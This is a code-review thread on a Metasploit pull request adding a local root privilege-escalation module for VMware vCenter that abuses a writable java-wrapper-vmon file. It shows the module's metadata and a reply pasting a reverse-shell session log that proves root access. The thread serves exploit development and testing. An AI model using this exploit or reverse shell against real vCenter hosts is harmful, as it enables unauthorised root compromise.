modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb

```diff
@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter vScalation Priv Esc',
+        'Description' => %q{
+          This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the
+          /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the
+          cis group to write to the file, which will execute as root on vmware-vmon service
+          restart or host reboot.
+
+          This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.
+          The following versions should be vulnerable:
+          vCenter 7.0 before U2c
+          vCenter 6.7 before U3o
+          vCenter 6.5 before U3q
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Yuval Lazar' # original PoC, analysis
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
```

Comment:
VCenter has an x86 version?

Reply:
no idea, but x86 payloads do run on the system:
```
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

whoami
root
uname -a
Linux localhost.domain4.4.8 #1-photon SMP Fri Oct 21 20:13:51 UTC 2016 x86_64 GNU/Linux
vpxd -v
Traceback (most recent call last):
  File "/usr/sbin/cloudvm-ram-size", line 52, in <module>
    sys.path.append(os.environ['VMWARE_PYTHON_PATH'])
  File "/usr/lib/python2.7/UserDict.py", line 40, in __getitem__
    raise KeyError(key)
KeyError: 'VMWARE_PYTHON_PATH'
VMware VirtualCenter 6.5.0 build-7070488
^Z
Background session 1? [y/N]  y
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > sessions -l
                               
Active sessions                
===============                
                               
  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               1.1.1.1:4444 -> 2.2.2.2:57524 (2.2.2.2)
```